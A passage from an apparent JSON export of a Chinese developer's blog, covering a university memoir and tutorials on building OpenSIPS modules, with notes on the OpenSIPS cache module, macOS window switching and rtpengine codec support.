所以我只能自己通过制作一些搞笑图片来自娱自乐。\n然而,一旦你学会某个东西,便真的有派上用场的时候。大四快毕业时,很多同学开始搞简历,简历上一般要贴照片的。所以我便成为了班级里远近闻名的修图大师。\n除了photoshop,专业课上可以说的就是学习编程了。当时我c语言学的非常好,授课老师经常在课堂上提我来回答问题。为了避免回答不上来问题,显得很没面子。我经常在上课之前偷偷的就预习上课的内容,并且学习如何解答课后的习题。所以老师的提问我经常可以轻松的回答。老师似乎我觉得我是个可育之才,经常在其他班级上课的时候,也会在课上提我的名字,说:其他班的王xx同学,他这个问题回答的很好。所以一些其他班级的同学,也是知道我的名字的。\n每每到考试之前,我总会收到不少加我QQ好友的申请,然后问我有没有时间,想找我帮他们复习c语言。然后带上饮料,约我到图书馆,当面传道授业解惑。我还记得一个比较奇葩的老师,给同学布置作业,要求实现某某功能,至少要求要有三千行代码,然后该同学东拼西凑,也只凑够了快一千行,然后找我帮忙。\n可以参考:\n大二的暑假,我们搬了校区。从远离市区的新校区,搬到了离市区比较近的老校区。\n快放假了,有不少的同学决定暑假留校,然后找点工作,赚点零花钱。\n我也觉得放假回家没意思,决定暑假找工作。因为我有一些photoshop的基础,所以就在招聘网站上写自己精通photoshop,看看有没有人需要。很快我找到了一份工作,然而刚开始的工作并不是图片制作,而是摄影摄像。具体的内容是给古玩艺术品拍照,然后我就一边学习一边拍照,照片拍完还要用ps做后期处理。所以整个暑假,包括大三,和大四。我基本上都在和古玩艺术品打交道,见识了不少的宝贝。从书画,到紫砂壶,玉器,陶器,手工艺品等等,都有接触。上海的各大古玩城,我也基本都跑过好几遍。也组织过一次小型的拍卖会,主要负责拍卖图册的制作。\n我的大三和大四时很忙的,倒不是学习,而是课外的工作。工作很累,每晚基本上都是9点以后下班,回到学校就基本上10点左右。有时候因为太累而在地铁上睡着,结果坐过站了。正好是最后一班地铁,所以只能下了地铁,步行往回走。\n课外的工作很累,但也学到了不少的东西。除此之外,就是自己赚钱能养活自己了。至少大三和大四,我没有再问父母要过生活费。即使是对于父母,要生活费这件事情,也让我觉得不在自在。我是一个向往自由的人,不希望被任何人束缚,即使是父母。\n课外工作的最后阶段,我用自己赚的钱买了人生第一个非常贵的手机iphone6s。我觉得,这是我应得的东西。\n匆匆4年,大学就这么结束了。我对大学并没有什么怀念,只是觉得,我算是蛮幸运的,至少没有白白浪费掉四年的光阴。","title":"我的传记 - 大学篇"},{"content":"flag的类型 enum flag_type { FLAG_TYPE_MSG=0, FLAG_TYPE_BRANCH, FLAG_LIST_COUNT, }; flag实际上是一种二进制的位 MAX_FLAG就是一个SIP消息最多可以有多少个flag\n#include \u0026lt;limits.h\u0026gt; typedef unsigned int flag_t; #define MAX_FLAG ((unsigned int)( sizeof(flag_t) * CHAR_BIT - 1 )) 这个值更具情况而定,我的机器上是最多32个。\n#include \u0026lt;stdio.h\u0026gt; #include \u0026lt;limits.h\u0026gt; typedef unsigned int flag_t; #define MAX_FLAG ((unsigned int)( sizeof(flag_t) * CHAR_BIT - 1 )) int main() { printf(\u0026#34;%zu\\n\u0026#34;, sizeof(unsigned int)); printf(\u0026#34;%u\\n\u0026#34;, CHAR_BIT); printf(\u0026#34;%u\\n\u0026#34;, MAX_FLAG); return 0; } $gcc -o main *.c $main 4 8 31 由字符串获取flag opensips 1.0时,flag都是整数,2.0才引入了字符串。\n用数字容易傻傻分不清楚,字符串比较容易理解。\nsetflag(3); setflag(4); setflag(5); setflag(IS_FROM_SBC); 首先,我们先要获取flag的字符串表示。这个可以用模块的参数传递进来。\nstatic param_export_t params[]={ {\u0026#34;use_test_flag\u0026#34;, STR_PARAM, \u0026amp;use_test_flag_str}, {0,0,0} }; 然后我们需要在mod_init或者fixup函数中获取字符串flag对应的flagId\nstatic int mod_init(void) { flag_use_high = get_flag_id_by_name(FLAG_TYPE_MSG, use_test_flag_str); LM_INFO(\u0026#34;flag mask: %d\\n\u0026#34;, flag_use_high); return 0; } 在消息处理中,用isflagset去判断flag是否存在。isflagset返回-1,就说明flag不存在。返回1就说明flag已经存在。\nstatic int w_find_zone_code(struct sip_msg* msg, char* str1,char* str2) { int is_set = isflagset(msg, flag_use_high); LM_INFO(\u0026#34;flag_use_high is %d\\n\u0026#34;, is_set); return 1; } ","permalink":"https://wdd.js.org/opensips/module-dev/l4-2/","summary":"flag的类型 enum flag_type { FLAG_TYPE_MSG=0, FLAG_TYPE_BRANCH, FLAG_LIST_COUNT, }; flag实际上是一种二进制的位 MAX_FLAG就是一个SIP消息最多可以有多少个flag\n#include \u0026lt;limits.h\u0026gt; typedef unsigned int flag_t; #define MAX_FLAG ((unsigned int)( sizeof(flag_t) * CHAR_BIT - 1 )) 这个值更具情况而定,我的机器上是最多32个。\n#include \u0026lt;stdio.h\u0026gt; #include \u0026lt;limits.h\u0026gt; typedef unsigned int flag_t; #define MAX_FLAG ((unsigned int)( sizeof(flag_t) * CHAR_BIT - 1 )) int main() { printf(\u0026#34;%zu\\n\u0026#34;, sizeof(unsigned int)); printf(\u0026#34;%u\\n\u0026#34;, CHAR_BIT); printf(\u0026#34;%u\\n\u0026#34;, MAX_FLAG); return 0; } $gcc -o main *.c $main 4 8 31 由字符串获取flag opensips 1.0时,flag都是整数,2.0才引入了字符串。\n用数字容易傻傻分不清楚,字符串比较容易理解。","title":"ch4-2 flag获取"},{"content":"最近看到澎湃新闻报道了一个博士论文的致谢部分,内容如下:\n走了很远的路,吃了很多的苦,才将这份博士学位论文送到你的面前。二十二载求学路,一路风雨泥泞,许多不容易。如梦一场,仿佛昨天一家人才团聚过。\n看到这个句子,我瞬间觉得一种似曾相识之感。\n我记得我也曾写过类似的句子。\n我花了很长的时间,走过了人生的大半个青葱岁月的花样年华 才学会什么是效率,什么是专一。 蓦然回首 10年的路,每次转变的开始都是感觉镣铐加身,步履维艰,屡次三番想要放弃\n生命不息 折腾不止 使用ubuntu作为主力开发工具\n其实,这种句子也不是我的原创。是我仿照我看过的一本小说,从中摘抄而来。\n这本小说叫做《项塔兰》\n我花了很长的岁月,走过大半个世界,才真正学到什么是爱、什么是命运,以及我们所做的抉择。我被拴在墙上遭受拷打时,才顿悟这个真谛。不知为何,就在我内心发出呐喊之际,我意识到,即使镣铐加身,一身血污,孤立无助,我仍然是自由之身,我可以决定是要痛恨拷打我的人,还是原谅他们。我知道,这听起来似乎算不了什么,但在镣铐加身、痛苦万分的当下,当镣铐是你唯一仅有的,那份自由将带给你无限的希望。是要痛恨,还是要原谅,这抉择足以决定人一生的际遇。《项塔兰》\n这是一名通缉犯的十年印度流亡岁月的记录,很难想象,一名在逃犯是如何写出如此优秀的文笔。各位看官有时间可以看看。\n参考 https://mp.weixin.qq.com/s/9kfGCXevO5Hlpg_iINof6Q ","permalink":"https://wdd.js.org/posts/2021/04/dttcg5/","summary":"最近看到澎湃新闻报道了一个博士论文的致谢部分,内容如下:\n走了很远的路,吃了很多的苦,才将这份博士学位论文送到你的面前。二十二载求学路,一路风雨泥泞,许多不容易。如梦一场,仿佛昨天一家人才团聚过。\n看到这个句子,我瞬间觉得一种似曾相识之感。\n我记得我也曾写过类似的句子。\n我花了很长的时间,走过了人生的大半个青葱岁月的花样年华 才学会什么是效率,什么是专一。 蓦然回首 10年的路,每次转变的开始都是感觉镣铐加身,步履维艰,屡次三番想要放弃\n生命不息 折腾不止 使用ubuntu作为主力开发工具\n其实,这种句子也不是我的原创。是我仿照我看过的一本小说,从中摘抄而来。\n这本小说叫做《项塔兰》\n我花了很长的岁月,走过大半个世界,才真正学到什么是爱、什么是命运,以及我们所做的抉择。我被拴在墙上遭受拷打时,才顿悟这个真谛。不知为何,就在我内心发出呐喊之际,我意识到,即使镣铐加身,一身血污,孤立无助,我仍然是自由之身,我可以决定是要痛恨拷打我的人,还是原谅他们。我知道,这听起来似乎算不了什么,但在镣铐加身、痛苦万分的当下,当镣铐是你唯一仅有的,那份自由将带给你无限的希望。是要痛恨,还是要原谅,这抉择足以决定人一生的际遇。《项塔兰》\n这是一名通缉犯的十年印度流亡岁月的记录,很难想象,一名在逃犯是如何写出如此优秀的文笔。各位看官有时间可以看看。\n参考 https://mp.weixin.qq.com/s/9kfGCXevO5Hlpg_iINof6Q ","title":"关于中科院回信文字的联想"},{"content":"底层可用 local 缓存存在本地,速度快,但是多实例无法共享,重启后消失 redis 缓存存在redis, 多实例可以共享,重启后不消失 接口 store -cache_store() 存储 fetch -cache_fetch() 获取 remove -cache_remove() 删除 add -cache_add() 递增 sub -cache_sub() 递减 cache_counter_fetch 获取某个key的值 关于过期的单位 虽然文档上没有明说,但是过期的单位都是秒。\ncachedb_local过期 loadmodule \u0026#34;cachedb_local.so\u0026#34; modparam(\u0026#34;cachedb_local\u0026#34;, \u0026#34;cachedb_url\u0026#34;, \u0026#34;local://\u0026#34;) modparam(\u0026#34;cachedb_local\u0026#34;, \u0026#34;cache_clean_period\u0026#34;, 600) route[xxx]{ cache_add(\u0026#34;local\u0026#34;, \u0026#34;$fu\u0026#34;, 100, 5); } 假如说:在5秒之内,同一个$fu来了多个请求,在设置这个$fu值的时候,计时器是不会重置的。过期的计时器还是第一次的设置的那个时间点开始计时。\n参考 https://www.opensips.org/Documentation/Tutorials-KeyValueInterface ","permalink":"https://wdd.js.org/opensips/ch6/cachedb/","summary":"底层可用 local 缓存存在本地,速度快,但是多实例无法共享,重启后消失 redis 缓存存在redis, 多实例可以共享,重启后不消失 接口 store -cache_store() 存储 fetch -cache_fetch() 获取 remove -cache_remove() 删除 add -cache_add() 递增 sub -cache_sub() 递减 cache_counter_fetch 获取某个key的值 关于过期的单位 虽然文档上没有明说,但是过期的单位都是秒。\ncachedb_local过期 loadmodule \u0026#34;cachedb_local.so\u0026#34; modparam(\u0026#34;cachedb_local\u0026#34;, \u0026#34;cachedb_url\u0026#34;, \u0026#34;local://\u0026#34;) modparam(\u0026#34;cachedb_local\u0026#34;, \u0026#34;cache_clean_period\u0026#34;, 600) route[xxx]{ cache_add(\u0026#34;local\u0026#34;, \u0026#34;$fu\u0026#34;, 100, 5); } 假如说:在5秒之内,同一个$fu来了多个请求,在设置这个$fu值的时候,计时器是不会重置的。过期的计时器还是第一次的设置的那个时间点开始计时。\n参考 https://www.opensips.org/Documentation/Tutorials-KeyValueInterface ","title":"cachedb的相关问题"},{"content":"模块传参有两种类型\n直接赋值传参 间接函数调用传参 str local_zone_code = {\u0026#34;\u0026#34;,0}; int some_int_param = 0; static param_export_t params[]={ // 直接字符串赋值 {\u0026#34;local_zone_code\u0026#34;, STR_PARAM, \u0026amp;local_zone_code.s}, // 直接整数赋值 {\u0026#34;some_int_param\u0026#34;, INT_PARAM, \u0026amp;some_int_param}, // 函数调用 字符窜 {\u0026#34;zone_code_map\u0026#34;, STR_PARAM|USE_FUNC_PARAM, (void *)\u0026amp;set_code_zone_map}, // 函数调用 整数 {\u0026#34;zone_code_map_int\u0026#34;, INT_PARAM|USE_FUNC_PARAM, (void *)\u0026amp;set_code_zone_map_int}, {0,0,0} }; 使用函数处理参数的好处是,可以对参数做更复杂的处理。\n例如:\n某个参数可以多次传递 对参数进行校验,在启动前就可以判断传参是否有问题。 static int set_code_zone_map(unsigned int type, void *val) { LM_INFO(\u0026#34;set_zone_code_map type:%d val:%s \\n\u0026#34;,type,(char *)val); return 1; } ","permalink":"https://wdd.js.org/opensips/module-dev/l4-1/","summary":"模块传参有两种类型\n直接赋值传参 间接函数调用传参 str local_zone_code = {\u0026#34;\u0026#34;,0}; int some_int_param = 0; static param_export_t params[]={ // 直接字符串赋值 {\u0026#34;local_zone_code\u0026#34;, STR_PARAM, \u0026amp;local_zone_code.s}, // 直接整数赋值 {\u0026#34;some_int_param\u0026#34;, INT_PARAM, \u0026amp;some_int_param}, // 函数调用 字符窜 {\u0026#34;zone_code_map\u0026#34;, STR_PARAM|USE_FUNC_PARAM, (void *)\u0026amp;set_code_zone_map}, // 函数调用 整数 {\u0026#34;zone_code_map_int\u0026#34;, INT_PARAM|USE_FUNC_PARAM, (void *)\u0026amp;set_code_zone_map_int}, {0,0,0} }; 使用函数处理参数的好处是,可以对参数做更复杂的处理。\n例如:\n某个参数可以多次传递 对参数进行校验,在启动前就可以判断传参是否有问题。 static int set_code_zone_map(unsigned int type, void *val) { LM_INFO(\u0026#34;set_zone_code_map type:%d val:%s \\n\u0026#34;,type,(char *)val); return 1; } ","title":"ch4-1 USE_FUNC_PARAM参数类型"},{"content":"本章节,带领大家探索opensips模块开发。希望深入了解opensips的同学可以看看。\n内容涵盖 章节的内容将会涵盖\nopensips的启动流程 如何创建一个模块 如何给模块传递参数 模块的生命周期函数的处理 如何暴露自定义的函数 如何检查函数的传惨 如何获取$var或者$avp变量 如何获取相关的flag 如何修改SIP消息 如何编写mi接口 如何编写statistics统计数据 如何做数据库操作 OpenSIPS架构 参考 https://voipmagazine.files.wordpress.com/2014/09/opensips-arch.jpg ","permalink":"https://wdd.js.org/opensips/module-dev/l1/","summary":"本章节,带领大家探索opensips模块开发。希望深入了解opensips的同学可以看看。\n内容涵盖 章节的内容将会涵盖\nopensips的启动流程 如何创建一个模块 如何给模块传递参数 模块的生命周期函数的处理 如何暴露自定义的函数 如何检查函数的传惨 如何获取$var或者$avp变量 如何获取相关的flag 如何修改SIP消息 如何编写mi接口 如何编写statistics统计数据 如何做数据库操作 OpenSIPS架构 参考 https://voipmagazine.files.wordpress.com/2014/09/opensips-arch.jpg ","title":"ch1 开发课程简介"},{"content":"开始 我们需要给home_location模块增加一个参数,配置当地的号码区号\n首先,我们删除maxfwd.c文件中开头的很多注释,我们先把注意力集中在代码上。\n删除了30多行注释,代码还剩160多行。\n首先我们一个变量,用来保存本地的区号。这个变量是个str类型。\nstr local_zone_code = {\u0026#34;\u0026#34;,0}; str 关于str类型,可以参考opensips/str.h头文件。\nstruct __str { char* s; /**\u0026lt; string as char array */ int len; /**\u0026lt; string length, not including null-termination */ }; typedef struct __str str; 实际上,str是个指向__str结构体,可以看出这个结构体有指向字符串的char*类型的指针,以及一个代表字符串长度的len属性。这样做的好处是可以高效的获取字符串的长度,很多有名的开源项目都有类似的结构体。\nopensips几乎所有的字符串都是用的str类型\nparam_export_t param_export_t这个结构体是用来通过脚本里面的modparam向模块传递参数的。这个数组最后一向是{0,0,0} 这最后一项其实是个标志,标志着数组的结束。\nstatic param_export_t params[]={ {\u0026#34;max_limit\u0026#34;, INT_PARAM, \u0026amp;max_limit}, {\u0026#34;local_zone_code\u0026#34;, STR_PARAM, \u0026amp;local_zone_code.s}, {0,0,0} }; 在sr_module_deps.h和sr_module.h中有下面的代码\ntypedef struct param_export_ param_export_t; param_export_t实际上是指向param_export_这个结构体。\n这个结构体有三个参数\nname 表示参数的名称 modparam_t 表示参数的类型。参数类型有以下几种 STR_PARAM 字符串类型 INT_PARAM 整数类型 USE_FUNC_PARAM 函数类型 PARAM_TYPE_MASK 这个用到的时候再说 param_pointer 是一个指针,用到的时候再具体说明 struct param_export_ { char* name; /*!\u0026lt; null terminated param. name */ modparam_t type; /*!\u0026lt; param. type */ void* param_pointer; /*!\u0026lt; pointer to the param. memory location */ }; #define STR_PARAM (1U\u0026lt;\u0026lt;0) /* String parameter type */ #define INT_PARAM (1U\u0026lt;\u0026lt;1) /* Integer parameter type */ #define USE_FUNC_PARAM (1U\u0026lt;\u0026lt;(8*sizeof(int)-1)) #define PARAM_TYPE_MASK(_x) ((_x)\u0026amp;(~USE_FUNC_PARAM)) typedef unsigned int modparam_t; 回过头来,看看local_zone_code这个参数的配置,是不是就非常明确了呀\n{\u0026#34;local_zone_code\u0026#34;, STR_PARAM, \u0026amp;local_zone_code.s}, 接着,你可能会问,加入我们配置好了这个参数,如何再运行的时候将local_zone_code这个变量的值打印出来呢?\n再module_exports这个结构体里面,最后的几个参数实际上是一个函数。\n这些函数再模块的生命周期内会调用。比如那个mod_init, 就是模块初始化的时候就会调用这个函数。\n那么,我们就在模块初始化的时候打印local_zone_code的值好了。\n下面的代码,我们其实只插入了一行, LM_INFO, 用来打印。其他就保持原样好了。\nmod_init函数的返回值是有特殊含义的,如果返回是0,表示成功。如果返回的是负数, 例如E_CFG, 这时候opensips就会认为你的脚本写的有问题,就不会继续启动opensips。\nstatic int mod_init(void) { LM_INFO(\u0026#34;initializing...\\n\u0026#34;); LM_INFO(\u0026#34;Initializing local_zone_code: %s\\n\u0026#34;, local_zone_code.s); if ( max_limit\u0026lt;1 || max_limit\u0026gt;MAXFWD_UPPER_LIMIT ) { LM_ERR(\u0026#34;invalid max limit (%d) [1,%d]\\n\u0026#34;, max_limit,MAXFWD_UPPER_LIMIT); return E_CFG; } return 0; } 再error.h中,可以看到opensips定义了很多的错误码。\n编译模块 源码的c文件我们修改好了,下面就是编译它,不知道会不会报错呢?😂\n➜ home_location git:(home_location) ✗ ./dev.sh build /root/code/gitee/opensips make[1]: Entering directory \u0026#39;/root/code/gitee/opensips/modules/home_location\u0026#39; Compiling maxfwd.c Linking home_location.so make[1]: Leaving directory \u0026#39;/root/code/gitee/opensips/modules/home_location\u0026#39; 似乎没啥问题\n编辑dev.cfg 增加local_zone_code参数 loadmodule \u0026#34;/root/code/gitee/opensips/modules/home_location/home_location.so\u0026#34; + modparam(\u0026#34;home_location\u0026#34;, \u0026#34;local_zone_code\u0026#34;, \u0026#34;010\u0026#34;) ./dev.sh start 看看log.txt, local_zone_code已经被打印出来,并且他的值是我们在cfg脚本里配置的010。\n~ Apr 21 13:47:40 [1048372] INFO:home_location:mod_init: initializing... ~ Apr 21 13:47:40 [1048372] INFO:home_location:mod_init: Initializing local_zone_code: 010 ok, 第三章结束。\n","permalink":"https://wdd.js.org/opensips/module-dev/l4/","summary":"开始 我们需要给home_location模块增加一个参数,配置当地的号码区号\n首先,我们删除maxfwd.c文件中开头的很多注释,我们先把注意力集中在代码上。\n删除了30多行注释,代码还剩160多行。\n首先我们一个变量,用来保存本地的区号。这个变量是个str类型。\nstr local_zone_code = {\u0026#34;\u0026#34;,0}; str 关于str类型,可以参考opensips/str.h头文件。\nstruct __str { char* s; /**\u0026lt; string as char array */ int len; /**\u0026lt; string length, not including null-termination */ }; typedef struct __str str; 实际上,str是个指向__str结构体,可以看出这个结构体有指向字符串的char*类型的指针,以及一个代表字符串长度的len属性。这样做的好处是可以高效的获取字符串的长度,很多有名的开源项目都有类似的结构体。\nopensips几乎所有的字符串都是用的str类型\nparam_export_t param_export_t这个结构体是用来通过脚本里面的modparam向模块传递参数的。这个数组最后一向是{0,0,0} 这最后一项其实是个标志,标志着数组的结束。\nstatic param_export_t params[]={ {\u0026#34;max_limit\u0026#34;, INT_PARAM, \u0026amp;max_limit}, {\u0026#34;local_zone_code\u0026#34;, STR_PARAM, \u0026amp;local_zone_code.s}, {0,0,0} }; 在sr_module_deps.h和sr_module.h中有下面的代码\ntypedef struct param_export_ param_export_t; param_export_t实际上是指向param_export_这个结构体。\n这个结构体有三个参数\nname 表示参数的名称 modparam_t 表示参数的类型。参数类型有以下几种 STR_PARAM 字符串类型 INT_PARAM 整数类型 USE_FUNC_PARAM 函数类型 PARAM_TYPE_MASK 这个用到的时候再说 param_pointer 是一个指针,用到的时候再具体说明 struct param_export_ { char* name; /*!","title":"ch4 配置模块的启动参数"},{"content":"从头写一个模块是比较麻烦的,我们可以基于一个简单的模块,然后在这个模块上进行一些修改。\n我们基于maxfwd这个模块,复制一个模块,叫做home_location。\n为什么叫做home_location呢?因为我想根据一个手机号,查出它的归属地,然后根据当地的归属地,判断号码前要不要加0\ncd modules cp -R maxfwd home_location ➜ home_location git:(home_location) ✗ ll total 300K drwxr-xr-x 2 root root 4.0K Apr 20 13:56 doc -rw-r--r-- 1 root root 217 Apr 20 14:00 Makefile -rw-r--r-- 1 root root 4.7K Apr 20 14:00 maxfwd.c -rw-r--r-- 1 root root 2.0K Apr 20 13:56 maxfwd.d -rw-r--r-- 1 root root 77K Apr 20 13:56 maxfwd.o -rwxr-xr-x 1 root root 93K Apr 20 13:56 maxfwd.so -rw-r--r-- 1 root root 4.0K Apr 20 13:56 mf_funcs.c -rw-r--r-- 1 root root 2.1K Apr 20 13:56 mf_funcs.d -rw-r--r-- 1 root root 1.2K Apr 20 13:56 mf_funcs.h -rw-r--r-- 1 root root 84K Apr 20 13:56 mf_funcs.o -rw-r--r-- 1 root root 7.0K Apr 20 13:56 README 下面的操作都是操作home_location目录下的文件。\n修改Makefile NAME改为home_location.so\nNAME=home_location.so 修改maxfwd.c module_exports的结构体的第一个参数,改为home_location 编译home_location模块 上面的操作,其实只是给maxfwd模块改了个名字,没有修改任何具体代码。\n我们在home_location目录下创建一个dev.sh脚本文件,用来做一些快速起停,或者编译模块的事项\ndev.sh #!/bin/bash case $1 in build) cd ../../ pwd; make modules modules=modules/home_location ;; start) killall opensips ulimit -t unlimited sleep 1 /usr/local/sbin/opensips -f ./dev.cfg -w . \u0026amp;\u0026gt; log.txt \u0026amp; echo $? ;; stop) killall opensips echo stop ;; *) echo bad;; esac chmod +x dev.sh # 用来编译home_location模块 ./dev.sh build # 用来启动opensips, 启动opensips之后,输出的日志会写到log.txt文件中, ./dev.sh start # 用来停止opensips ./dev.sh stop dev.cfg 启动opensips需要一个cfg脚本文件,我们自己做一个简单的\n脚本有以下的注意点:\nloadmodule加载home_location.so我使用了绝对路径,如果在你自己的机器上,目录可能需要修改 log_level=3 log_stderror=yes log_facility=LOG_LOCAL0 debug_mode=no memdump=1 auto_aliases=no listen=udp:0.0.0.0:17634 listen=tcp:0.0.0.0:17634 mpath=\u0026#34;/usr/local/lib64/opensips/modules/\u0026#34; loadmodule \u0026#34;proto_udp.so\u0026#34; loadmodule \u0026#34;proto_tcp.so\u0026#34; loadmodule \u0026#34;mi_fifo.so\u0026#34; modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo\u0026#34;) modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_mode\u0026#34;, 0666) loadmodule \u0026#34;/root/code/gitee/opensips/modules/home_location/home_location.so\u0026#34; startup_route{ xlog(\u0026#34;opensips startup\u0026#34;); } route{ xlog(\u0026#34;hello\u0026#34;); } 运行demo ./dev.sh build # 构建脚本 ./dev.sh start # 启动opensips 没有意外的话,opensips启动成功,可以看下log.txt的内容, 也可以通过netstat -nulp | grep opensips 查找opensips的进程\n➜ home_location git:(home_location) ✗ tail log.txt Apr 20 23:00:37 [748389] INFO:core:main: using 2 Mb of private process memory Apr 20 23:00:37 [748389] INFO:core:init_reactor_size: reactor size 1024 (using up to 0.03Mb of memory per process) Apr 20 23:00:37 [748389] INFO:core:evi_publish_event: Registered event \u0026lt;E_CORE_THRESHOLD(0)\u0026gt; Apr 20 23:00:37 [748389] INFO:core:evi_publish_event: Registered event \u0026lt;E_CORE_SHM_THRESHOLD(1)\u0026gt; Apr 20 23:00:37 [748389] INFO:core:evi_publish_event: Registered event \u0026lt;E_CORE_PKG_THRESHOLD(2)\u0026gt; Apr 20 23:00:37 [748389] INFO:core:mod_init: initializing UDP-plain protocol Apr 20 23:00:37 [748389] INFO:core:mod_init: initializing TCP-plain protocol Apr 20 23:00:37 [748389] INFO:home_location:mod_init: initializing... Apr 20 23:00:37 [748396] opensips startupApr 20 23:00:37 [748380] INFO:core:daemonize: pre-daemon process exiting with 0 Apr 21 05:32:32 [748410] WARNING:core:handle_timer_job: timer job \u0026lt;blcore-expire\u0026gt; has a 100000 us delay in execution ","permalink":"https://wdd.js.org/opensips/module-dev/l3/","summary":"从头写一个模块是比较麻烦的,我们可以基于一个简单的模块,然后在这个模块上进行一些修改。\n我们基于maxfwd这个模块,复制一个模块,叫做home_location。\n为什么叫做home_location呢?因为我想根据一个手机号,查出它的归属地,然后根据当地的归属地,判断号码前要不要加0\ncd modules cp -R maxfwd home_location ➜ home_location git:(home_location) ✗ ll total 300K drwxr-xr-x 2 root root 4.0K Apr 20 13:56 doc -rw-r--r-- 1 root root 217 Apr 20 14:00 Makefile -rw-r--r-- 1 root root 4.7K Apr 20 14:00 maxfwd.c -rw-r--r-- 1 root root 2.0K Apr 20 13:56 maxfwd.d -rw-r--r-- 1 root root 77K Apr 20 13:56 maxfwd.o -rwxr-xr-x 1 root root 93K Apr 20 13:56 maxfwd.so -rw-r--r-- 1 root root 4.","title":"ch3 复制并裁剪一个模块"},{"content":"环境说明 ubuntu 20.04 opensips 2.4 克隆仓库 由于github官方的仓库clone太慢,最好选择从国内的gitee上克隆。\n下面的gfo, gco, gl, gcb都是oh-my-zsh中git插件的快捷键。建议你要么安装oh-my-zsh, 或者也可以看看这些快捷方式对应的底层命令是什么 https://github.com/ohmyzsh/ohmyzsh/tree/master/plugins/git\ngit clone https://gitee.com/wangduanduan/opensips.git gfo 2.4:2.4 gco 2.4 gl gcb home_location #基于2.4分支创建home_location分支 安装依赖 apt update apt install -y build-essential bison flex m4 pkg-config libncurses5-dev \\ rsyslog libmysqlclient-dev \\ libssl-dev mysql-client libmicrohttpd-dev libcurl4-openssl-dev uuid-dev \\ libpcre3-dev libconfuse-dev libxml2-dev libhiredis-dev 编译安装 make all -j4 include_modules=\u0026#34;db_mysql\u0026#34; make install include_modules=\u0026#34;db_mysql\u0026#34; 测试 ➜ opensips git:(home_location) opensips -V version: opensips 2.4.9 (x86_64/linux) flags: STATS: On, DISABLE_NAGLE, USE_MCAST, SHM_MMAP, PKG_MALLOC, F_MALLOC, FAST_LOCK-ADAPTIVE_WAIT ADAPTIVE_WAIT_LOOPS=1024, MAX_RECV_BUFFER_SIZE 262144, MAX_LISTEN 16, MAX_URI_SIZE 1024, BUF_SIZE 65535 poll method support: poll, epoll, sigio_rt, select. git revision: 9c2c8638e main.c compiled on 13:49:33 Apr 20 2021 with gcc 9 ","permalink":"https://wdd.js.org/opensips/module-dev/l2/","summary":"环境说明 ubuntu 20.04 opensips 2.4 克隆仓库 由于github官方的仓库clone太慢,最好选择从国内的gitee上克隆。\n下面的gfo, gco, gl, gcb都是oh-my-zsh中git插件的快捷键。建议你要么安装oh-my-zsh, 或者也可以看看这些快捷方式对应的底层命令是什么 https://github.com/ohmyzsh/ohmyzsh/tree/master/plugins/git\ngit clone https://gitee.com/wangduanduan/opensips.git gfo 2.4:2.4 gco 2.4 gl gcb home_location #基于2.4分支创建home_location分支 安装依赖 apt update apt install -y build-essential bison flex m4 pkg-config libncurses5-dev \\ rsyslog libmysqlclient-dev \\ libssl-dev mysql-client libmicrohttpd-dev libcurl4-openssl-dev uuid-dev \\ libpcre3-dev libconfuse-dev libxml2-dev libhiredis-dev 编译安装 make all -j4 include_modules=\u0026#34;db_mysql\u0026#34; make install include_modules=\u0026#34;db_mysql\u0026#34; 测试 ➜ opensips git:(home_location) opensips -V version: opensips 2.4.9 (x86_64/linux) flags: STATS: On, DISABLE_NAGLE, USE_MCAST, SHM_MMAP, PKG_MALLOC, F_MALLOC, FAST_LOCK-ADAPTIVE_WAIT ADAPTIVE_WAIT_LOOPS=1024, MAX_RECV_BUFFER_SIZE 262144, MAX_LISTEN 16, MAX_URI_SIZE 1024, BUF_SIZE 65535 poll method support: poll, epoll, sigio_rt, select.","title":"ch2 初始化环境"},{"content":"Intro Sonic is a fast, lightweight and schema-less search backend. It ingests search texts and identifier tuples that can then be queried against in a microsecond\u0026rsquo;s time.\ninstall ref https://github.com/valeriansaliou/sonic https://crates.io/crates/sonic-server ","permalink":"https://wdd.js.org/posts/2021/04/kvg1r9/","summary":"Intro Sonic is a fast, lightweight and schema-less search backend. It ingests search texts and identifier tuples that can then be queried against in a microsecond\u0026rsquo;s time.\ninstall ref https://github.com/valeriansaliou/sonic https://crates.io/crates/sonic-server ","title":"learn Sonic"},{"content":"今天发现一个问题,按住command + tab, 已经切换到对应的应用图标上,但是松开按键之后,屏幕并没有切换到新的App屏幕上。特别是那些全屏的应用。\n看了很多资料,都是没啥用的,最后发现\nhttps://apple.stackexchange.com/questions/112350/cmdtab-does-not-work-on-hidden-or-minimized-windows 最终发现,需要设置调度中心的 切换到某个应用时,会切换到包含该应用程序的打开的窗口空间, 这个必需要勾选。\n","permalink":"https://wdd.js.org/posts/2021/04/gt9iss/","summary":"今天发现一个问题,按住command + tab, 已经切换到对应的应用图标上,但是松开按键之后,屏幕并没有切换到新的App屏幕上。特别是那些全屏的应用。\n看了很多资料,都是没啥用的,最后发现\nhttps://apple.stackexchange.com/questions/112350/cmdtab-does-not-work-on-hidden-or-minimized-windows 最终发现,需要设置调度中心的 切换到某个应用时,会切换到包含该应用程序的打开的窗口空间, 这个必需要勾选。","title":"command + tab 无法切换窗口了?"},{"content":"ilbc的编码特定是占用带宽小,并且抗丢表。但是rtpengine是不支持ilbc编码的,可以参考的资料有以下两个\nhttps://github.com/sipwise/rtpengine/issues/897 https://sr-users.sip-router.narkive.com/f3jhDeyU/rtpengine-and-ilbc-support 使用rtpengine --codecs可以打印出rtpengine支持的编解码\nrtpengine --codecs PCMA: fully supported PCMU: fully supported G723: fully supported G722: fully supported QCELP: supported for decoding only G729: supported for decoding only speex: fully supported GSM: fully supported iLBC: not supported opus: fully supported vorbis: fully supported ac3: fully supported eac3: fully supported ATRAC3: supported for decoding only ATRAC-X: supported for decoding only AMR: fully supported AMR-WB: fully supported PCM-S16LE: fully supported MP3: fully supported 下面的操作基于debian:9-slim的基础镜像构建的,在构建rtpengine之前,我们先编译ilbc的依赖库\nRUN echo \u0026#34;deb http://www.deb-multimedia.org stretch main\u0026#34; \u0026gt;\u0026gt; /etc/apt/sources.list \\ \u0026amp;\u0026amp; apt-get update \\ \u0026amp;\u0026amp; apt-get install deb-multimedia-keyring -y --allow-unauthenticated \\ \u0026amp;\u0026amp; apt-get install libilbc-dev libavcodec-dev libilbc2 -y --allow-unauthenticated 安装以来之后,继续构建rtpengine, 